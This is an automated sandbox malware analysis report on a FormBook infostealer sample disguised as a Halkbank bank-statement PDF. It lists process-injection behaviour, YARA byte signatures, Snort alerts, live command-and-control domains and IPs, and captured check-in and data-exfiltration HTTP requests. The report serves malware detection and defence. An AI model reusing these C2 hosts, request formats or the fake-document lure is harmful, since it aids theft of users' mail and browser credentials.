Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe

Overview

General Information

Sample Name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
Analysis ID:811929
MD5:0d84005af71574a568567967e666cda5
SHA1:22bd76803c3d004f48be0b25ba0ec1920ccc3360
SHA256:05977847b0408ec1abb7b4cd05ad10b4004c97d5c949e579d695d47518f4f376
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe (PID: 2064 cmdline: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe MD5: 0D84005AF71574A568567967E666CDA5)
    • vokkqsp.exe (PID: 1240 cmdline: "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf MD5: D2FAF24547268D9525AE7E78CD4DE87A)
      • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • vokkqsp.exe (PID: 2448 cmdline: C:\Users\user\AppData\Local\Temp\vokkqsp.exe MD5: D2FAF24547268D9525AE7E78CD4DE87A)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • colorcpl.exe (PID: 5260 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18105:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ba1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18207:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1837f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.vokkqsp.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.vokkqsp.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x192ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.vokkqsp.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x190b8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b54:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x191ba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19332:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9cd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ee2a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fddd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.vokkqsp.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.vokkqsp.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.4198.54.117.21249703802031449 02/20/23-11:24:46.771477
          SID:2031449
          Source Port:49703
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4198.54.117.21249703802031412 02/20/23-11:24:46.771477
          SID:2031412
          Source Port:49703
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4198.54.117.21249703802031453 02/20/23-11:24:46.771477
          SID:2031453
          Source Port:49703
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.856572532023883 02/20/23-11:23:29.507639
          SID:2023883
          Source Port:56572
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 35%
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 44%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vokkqsp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vokkqsp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.searchvity.com/?dn=URL Reputation: Label: malware
          Source: http://www.searchvity.com/URL Reputation: Label: malware
          Source: http://ladybillplanet.com/ghii/?1LM=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lCAvira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/Avira URL Cloud: Label: malware
          Source: http://www.octohoki.netAvira URL Cloud: Label: malware
          Source: http://www.hubyazilim.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/?1LM=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqaEj2Tcyyr5eEg==&kTj=94JTJ5e-oGAvira URL Cloud: Label: malware
          Source: http://www.7dkjhk.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyzAvira URL Cloud: Label: malware
          Source: http://www.ladybillplanet.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.octohoki.net/ghii/?1LM=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIleqyuhYHktxRXxg==&kTj=94JTJ5e-oGAvira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/?1LM=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AgWuiPHLLIEAEQ==&kTj=94JTJ5e-oGAvira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/?1LM=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5RnkbE2XBG6Jig==&kTj=94JTJ5e-oGAvira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/Avira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeAvira: detection malicious, Label: HEUR/AGEN.1213060
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeReversingLabs: Detection: 12%
          Machine Learning detection for sample
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeJoe Sandbox ML: detected
          Source: 1.2.vokkqsp.exe.650000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.vokkqsp.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: colorcpl.pdbGCTL source: vokkqsp.exe, 00000003.00000002.346318075.0000000000E60000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: vokkqsp.exe, 00000003.00000002.346318075.0000000000E60000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vokkqsp.exe, 00000001.00000003.302185961.000000001A230000.00000004.00001000.00020000.00000000.sdmp, vokkqsp.exe, 00000001.00000003.306583480.000000001A0A0000.00000004.00001000.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000003.308452464.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000003.306750536.000000000070D000.00000004.00000020.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000002.344637364.0000000000B5F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.346236668.0000000004ED3000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.569116522.000000000518F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.343907038.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.569116522.0000000005070000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vokkqsp.exe, vokkqsp.exe, 00000003.00000003.308452464.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000003.306750536.000000000070D000.00000004.00000020.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, vokkqsp.exe, 00000003.00000002.344637364.0000000000B5F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.346236668.0000000004ED3000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.569116522.000000000518F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.343907038.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.569116522.0000000005070000.00000040.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00424002 FindFirstFileExW,1_2_00424002
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0040101E FindFirstFileW,FindClose,1_2_0040101E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0040101F FindFirstFileW,FindClose,1_2_0040101F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004243EC FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_004243EC

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ladybillplanet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:56572 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 198.54.117.212:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 198.54.117.212:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 198.54.117.212:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.energybig.xyz
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AgWuiPHLLIEAEQ==&kTj=94JTJ5e-oG HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqaEj2Tcyyr5eEg==&kTj=94JTJ5e-oG HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5RnkbE2XBG6Jig==&kTj=94JTJ5e-oG HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIleqyuhYHktxRXxg==&kTj=94JTJ5e-oG HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEJ5LEY61yEIXoQ==&kTj=94JTJ5e-oG HTTP/1.1Host: www.ladybillplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.146 66.235.200.146
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 4c 4d 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 78 68 34 74 48 62 65 63 57 2d 5a 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1LM=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4xh4tHbecW-ZODv6UUA).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.genuineinsights.cloudConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.genuineinsights.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.genuineinsights.cloud/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 4c 4d 3d 57 5f 42 47 48 56 4b 79 39 42 52 73 41 79 6c 48 66 4a 73 2d 79 6e 77 4a 62 75 4d 36 37 39 6f 4a 76 7a 45 4b 48 6f 49 72 61 53 32 72 4b 2d 59 66 63 36 44 6d 69 44 4b 58 38 2d 4d 4d 74 68 33 4c 48 62 54 6f 65 6b 78 58 67 56 34 31 42 65 56 5a 6e 56 73 49 32 6c 37 68 46 33 57 49 61 77 32 32 6d 2d 31 32 6b 59 4d 2d 64 56 51 69 5a 63 33 6e 74 31 47 70 4b 4c 57 7a 56 35 6f 58 66 48 4c 59 64 70 31 61 74 42 7e 65 30 4c 28 6a 59 61 6c 34 5a 5f 4d 6d 30 32 72 73 53 75 4b 76 6b 38 41 6b 53 31 74 66 38 4a 6d 62 57 6a 48 4e 66 51 53 58 37 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1LM=W_BGHVKy9BRsAylHfJs-ynwJbuM679oJvzEKHoIraS2rK-Yfc6DmiDKX8-MMth3LHbToekxXgV41BeVZnVsI2l7hF3WIaw22m-12kYM-dVQiZc3nt1GpKLWzV5oXfHLYdp1atB~e0L(jYal4Z_Mm02rsSuKvk8AkS1tf8JmbWjHNfQSX7Q).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.octohoki.netConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.octohoki.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.octohoki.net/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 4c 4d 3d 72 5a 6e 54 4d 5a 52 69 46 75 51 4c 79 4e 6d 72 33 42 34 79 59 54 51 58 45 59 56 35 79 37 45 37 47 5a 4a 4e 63 41 77 4c 59 62 6f 54 41 43 56 37 45 59 4e 4f 49 4c 6c 41 74 35 35 63 64 4f 64 59 31 7a 71 51 34 36 59 6f 4c 50 4e 42 4d 67 51 4f 44 30 59 78 55 35 6d 4c 37 49 6d 47 71 45 6b 70 35 46 35 38 47 67 45 76 58 75 64 2d 4b 5a 32 31 30 64 6a 6e 37 50 76 35 45 75 51 63 73 43 52 53 58 67 35 54 45 49 76 35 41 53 66 39 76 46 31 49 55 6a 4d 68 75 6b 53 6b 4d 43 5a 77 71 78 4a 6d 47 45 34 55 71 71 64 36 6d 4f 58 43 5a 52 6c 78 49 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1LM=rZnTMZRiFuQLyNmr3B4yYTQXEYV5y7E7GZJNcAwLYboTACV7EYNOILlAt55cdOdY1zqQ46YoLPNBMgQOD0YxU5mL7ImGqEkp5F58GgEvXud-KZ210djn7Pv5EuQcsCRSXg5TEIv5ASf9vF1IUjMhukSkMCZwqxJmGE4Uqqd6mOXCZRlxIQ).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.ladybillplanet.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.ladybillplanet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ladybillplanet.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 4c 4d 3d 71 50 59 4d 58 4e 6c 66 51 6d 31 32 44 32 74 59 49 61 33 61 6c 5a 4a 68 39 35 7a 6e 4a 32 7a 38 77 4a 4b 71 28 43 61 34 78 69 69 47 70 78 59 39 76 4d 74 36 66 43 66 6f 69 73 6b 31 6d 72 38 36 43 2d 48 68 6e 70 47 5f 4c 45 36 34 66 56 30 56 37 58 72 39 4e 35 52 2d 62 39 61 6a 38 42 51 63 33 42 28 4e 73 37 33 7a 6e 4a 6b 4b 42 61 53 45 66 59 50 30 78 38 73 35 28 37 4f 63 59 46 52 73 6f 32 42 65 45 58 66 6a 79 65 31 32 72 34 49 4b 79 71 7e 76 5a 32 6d 63 50 73 56 7a 32 4d 46 34 56 73 4a 61 54 73 38 68 4c 71 38 71 45 34 7e 49 4a 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1LM=qPYMXNlfQm12D2tYIa3alZJh95znJ2z8wJKq(Ca4xiiGpxY9vMt6fCfoisk1mr86C-HhnpG_LE64fV0V7Xr9N5R-b9aj8BQc3B(Ns73znJkKBaSEfYP0x8s5(7OcYFRso2BeEXfjye12r4IKyq~vZ2mcPsVz2MF4VsJaTs8hLq8qE4~IJg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Feb 2023 10:21:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Feb 2023 10:24:27 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 